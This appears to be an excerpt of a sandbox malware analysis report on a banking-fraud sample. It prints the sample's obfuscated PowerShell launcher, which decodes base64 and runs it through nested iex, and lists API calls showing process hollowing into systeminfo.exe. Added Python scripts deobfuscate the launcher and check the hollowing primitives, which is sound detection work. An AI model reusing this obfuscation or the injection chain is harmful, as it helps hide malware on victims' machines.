Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

                        E-Banking Fraud

Source: Yara match | File source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                        System Summary

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"
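The command line above hides `[System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String("..."))` behind randomised letter case, with the `::` and `"` tokens assembled from `[char]` casts, and hands the concatenated string to two nested `iex` calls; the `DeviceCredentialDeployment.exe` call in front of it is the signed Windows binary commonly abused to hide the PowerShell console window. The Python below is an added example, not part of the report and not the sample's code: it unfolds that construction statically (fold the `'literal'+[char]N` chain, pull out the base64 argument, decode it) and lists the mixed-case tokens behind the report's case-anomaly finding. The command line in it is a constructed stand-in with the same shape; its base64 payload is a placeholder of our own, since the report does not reproduce the real one.

```python
import base64
import re

# Constructed stand-in for the report's command line: same obfuscation shape
# (random letter case, "::" and '"' built from [char] casts, string concatenation
# fed to nested iex), but the base64 payload is our own placeholder, not the
# sample's, which the report does not reproduce.
INNER_PAYLOAD = "Write-Host 'second stage placeholder'"
SAMPLE_CMDLINE = (
    "POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; "
    "iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+"
    "'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+"
    "'FROmbasE64string('+[Char]34+'"
    + base64.b64encode(INNER_PAYLOAD.encode()).decode()
    + "'+[cHaR]0x22+'))')))"
)

# One concatenation operand: a single-quoted literal or a [char]N cast (hex or decimal).
OPERAND = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
IEX_CALL = re.compile(r"\biex\s*\(", re.IGNORECASE)
B64_CALL = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)


def fold_concatenation(expr):
    """Evaluate an expression made only of 'literal' + [char]N operands, in order."""
    parts = []
    for literal, number in OPERAND.findall(expr):
        # int(x, 0) accepts both the 0X3A and the 58 spellings used in the sample
        parts.append(chr(int(number, 0)) if number else literal)
    return "".join(parts)


def innermost_iex_argument(cmdline):
    """Text after the last iex( : the expression whose value the outer iex executes."""
    calls = list(IEX_CALL.finditer(cmdline))
    return cmdline[calls[-1].end():] if calls else cmdline


def decode_stage(folded):
    """Pull the FromBase64String("...") argument out of the folded expression and decode it."""
    m = B64_CALL.search(folded)
    return base64.b64decode(m.group(1)).decode("utf-8") if m else None


def mixed_case_tokens(cmdline):
    """Whitespace-separated tokens whose letters after the first mix upper and lower
    case (the case anomaly the report flags). Heuristic: CamelCase names trip it too."""
    flagged = []
    for tok in cmdline.split():
        rest = tok[1:]
        if any(c.isupper() for c in rest) and any(c.islower() for c in rest):
            flagged.append(tok)
    return flagged


def deobfuscate(cmdline):
    folded = fold_concatenation(innermost_iex_argument(cmdline))
    return {"folded": folded, "payload": decode_stage(folded),
            "case_anomalies": mixed_case_tokens(cmdline)}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    print(result["folded"])
    print(result["payload"])
    print(result["case_anomalies"])
```

Folding before decoding matters: a regex for `FromBase64String` run on the raw command line finds nothing, because the method name is split across case-mangled literals and the quotes do not exist until the `[char]34` / `[char]0x22` casts are evaluated.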
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\csrss.exe
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03813208 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_0381A190 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_0381A0AC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_0381A024 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03815634 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03813554 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03813AA8 NtReadVirtualMemory
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03813D18 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03813206 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03815632 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03819FD0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0042C663 NtClose
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC3090 NtSetValueKey
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC3010 NtOpenDirectoryObject
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC4340 NtSetContextThread
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC4650 NtSuspendThread
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC39B0 NtGetContextThread
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2AD0 NtReadFile
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2AF0 NtWriteFile
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2AB0 NtWaitForSingleObject
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2BE0 NtQueryValueKey
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2BF0 NtAllocateVirtualMemory
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2B80 NtQueryInformationFile
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2BA0 NtEnumerateValueKey
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2CC0 NtQueryVirtualMemory
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2CF0 NtOpenProcess
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2CA0 NtQueryInformationToken
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2C60 NtCreateKey
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2C00 NtQueryInformationProcess
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2DD0 NtDelayExecution
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2DB0 NtEnumerateKey
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC3D70 NtOpenThread
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2D00 NtSetInformationFile
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC3D10 NtOpenProcessToken
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2D10 NtMapViewOfSection
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2D30 NtUnmapViewOfSection
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2EE0 NtQueueApcThread
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2E80 NtReadVirtualMemory
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2EA0 NtAdjustPrivilegesToken
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2E30 NtWriteVirtualMemory
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2FE0 NtCreateFile
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2F90 NtProtectVirtualMemory
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2FA0 NtQuerySection
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2FB0 NtResumeThread
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2F60 NtCreateProcessEx
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC2F30 NtCreateSection
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043435C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04344650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04344340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043439B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04343010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04343090 NtSetValueKey
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04343D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04343D70 NtOpenThread
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342FA0 NtQuerySection
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04342B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_02429210 NtReadFile
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_02429300 NtDeleteFile
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_024293A0 NtClose
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_024290B0 NtCreateFile
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_02429510 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03813DD8 CreateProcessAsUserW
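Two things in the rows above are worth checking mechanically rather than by eye. The csrss.exe rows (NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, Get/SetThreadContext with their Wow64 variants, NtResumeThread, and CreateProcessAsUserW) are the complete primitive set of process hollowing. And the iaoqralA.pif and systeminfo.exe rows name the same Nt* stubs at addresses that differ only in their upper bytes (17_2_30CC35C0 against 21_2_043435C0 for NtCreateMutant, 17_2_30CC2D30 against 21_2_04342D30 for NtUnmapViewOfSection, and so on), which is what one body of code mapped at two different bases looks like. The Python below is an added example, not part of the report: it parses rows in the form the page renders them, checks each process for the hollowing primitive set, measures the relocation delta between processes 17 and 21, and decodes the process index and page protection from a .sdmp name. The embedded rows are copied from this section; the stage names and the .sdmp field reading are this example's own.

```python
import re
from collections import Counter, namedtuple

# Rows copied from this report's System Summary (a subset of its "Code function"
# rows for csrss.exe, iaoqralA.pif and systeminfo.exe), kept in the fused form
# the page renders; the parser also accepts "Source: ... | Code function: ...".
REPORT_ROWS = r"""
Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813208 NtAllocateVirtualMemory,12_2_03813208
Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03815634 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_03815634
Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813554 NtWriteVirtualMemory,12_2_03813554
Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813D18 NtUnmapViewOfSection,12_2_03813D18
Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813DD8 CreateProcessAsUserW,12_2_03813DD8
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC35C0 NtCreateMutant,LdrInitializeThunk,17_2_30CC35C0
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC4340 NtSetContextThread,17_2_30CC4340
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2AD0 NtReadFile,17_2_30CC2AD0
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2BF0 NtAllocateVirtualMemory,17_2_30CC2BF0
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2D30 NtUnmapViewOfSection,17_2_30CC2D30
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2E30 NtWriteVirtualMemory,17_2_30CC2E30
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2FB0 NtResumeThread,17_2_30CC2FB0
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2F60 NtCreateProcessEx,17_2_30CC2F60
Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0041860317_2_00418603
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043435C0 NtCreateMutant,LdrInitializeThunk,21_2_043435C0
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04344340 NtSetContextThread,LdrInitializeThunk,21_2_04344340
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342AD0 NtReadFile,LdrInitializeThunk,21_2_04342AD0
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342BF0 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_04342BF0
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342D30 NtUnmapViewOfSection,LdrInitializeThunk,21_2_04342D30
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342E30 NtWriteVirtualMemory,21_2_04342E30
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342FB0 NtResumeThread,LdrInitializeThunk,21_2_04342FB0
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342F60 NtCreateProcessEx,21_2_04342F60
Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_02429210 NtReadFile,21_2_02429210
"""

Record = namedtuple("Record", "image pid run addr apis")

# <image>[ | ]Code function: <pid>_<run>_<addr> <api,api,...>,<pid>_<run>_<addr>
ROW = re.compile(
    r"Source:\s*(?P<image>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*"
    r"(?P<apis>[A-Za-z0-9_,]*?),?(?P=pid)_(?P=run)_(?P=addr)\s*$"
)


def parse_rows(text):
    recs = []
    for line in text.strip().splitlines():
        m = ROW.search(line)
        if m:
            apis = tuple(a for a in m["apis"].split(",") if a)
            recs.append(Record(m["image"], int(m["pid"]), int(m["run"]),
                               int(m["addr"], 16), apis))
    return recs


RECS = parse_rows(REPORT_ROWS)

# The primitives of process hollowing. The report lists functions statically, so this
# is a presence check of the full primitive set per process, not a call-order trace.
HOLLOWING_STAGES = {
    "create target": {"CreateProcessAsUserW", "CreateProcessW", "CreateProcessA", "NtCreateProcessEx"},
    "unmap target image": {"NtUnmapViewOfSection"},
    "allocate in target": {"NtAllocateVirtualMemory"},
    "write payload": {"NtWriteVirtualMemory"},
    "redirect entry point": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume target": {"NtResumeThread"},
}


def hollowing_stages(recs, pid):
    seen = {api for r in recs if r.pid == pid for api in r.apis}
    return {stage: bool(seen & names) for stage, names in HOLLOWING_STAGES.items()}


def hollowing_complete(recs, pid):
    return all(hollowing_stages(recs, pid).values())


def relocation_delta(recs, pid_a, pid_b):
    """Most common addr_a - addr_b over stubs whose leading API name matches, with the
    number of stub pairs that agree. One dominant delta means both processes hold the
    same code at different bases, i.e. one copy was injected into the other."""
    by_api = {}
    for r in recs:
        if r.apis:
            by_api.setdefault(r.apis[0], {}).setdefault(r.pid, set()).add(r.addr)
    votes = Counter(a - b for per_pid in by_api.values()
                    for a in per_pid.get(pid_a, ()) for b in per_pid.get(pid_b, ()))
    return votes.most_common(1)[0] if votes else None


def parse_dump_name(name):
    """Joe Sandbox .sdmp names start with the process index in hex (00000015 -> 21,
    the "21_2_" rows), then the run, a dump id, the region base and the page
    protection (0x40 = PAGE_EXECUTE_READWRITE); later fields are not decoded here."""
    f = name.split(".")
    return {"pid": int(f[0], 16), "run": int(f[1], 16),
            "base": int(f[3], 16), "protect": int(f[4], 16)}


if __name__ == "__main__":
    for pid in (12, 17, 21):
        print(pid, hollowing_stages(RECS, pid))
    delta, agreeing = relocation_delta(RECS, 17, 21)
    print(f"iaoqralA.pif -> systeminfo.exe delta 0x{delta:08X}, {agreeing} stubs agree")
```

On the rows above the delta comes out as 0x2C980000 for every paired stub, while the second NtReadFile in systeminfo.exe at 21_2_02429210 votes alone for a different value: that one belongs to the separate 0x02400000 region the E-Banking Fraud Yara match names, not to the relocated copy.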
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_038020B4
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_00418603
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0040E04C
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_00410053
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0040E053
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_00403060
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_00416803
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0040E197
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0040E1A3
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_00401BE5
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_00401BF0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0042EC63
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_0040FE33
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_004167FE
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C970C0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3F0CC
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4F0E0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D470E9
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D481CC
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C9B1B0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D501AA
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CC516C
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7F172
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D5B16B
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C80100
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D2A118
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAB2C0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D312ED
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C952A0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D30274
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D503E6
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C9E3F0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CD739A
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4A352
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7D34C
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4132D
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3E4F6
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D42446
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C81460
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4F43F
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D50591
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D2D5B0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D47571
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C90535
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D416CC
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAC6E0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C8C7C0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4F7B0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB4750
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C90770
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C938E0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBE8F0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C768B8
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C92840
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C9A840
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C929A0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D5A9A6
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C99950
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAB950
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA6962
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3DAC6
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C8EA80
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CD5AA0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D2DAAC
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D47A46
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4FA49
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D03A6C
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D46BD7
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CCDBF9
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAFB80
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4AB40
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4FB76
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4FCF2
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C80CF2
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D30CB5
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C90C00
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D09C32
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAFDC0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C8ADE0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA8DBF
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C93D40
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D41D5A
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D47D73
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C9AD00
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4EEDB
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4CE93
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA2E90
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C99EB0
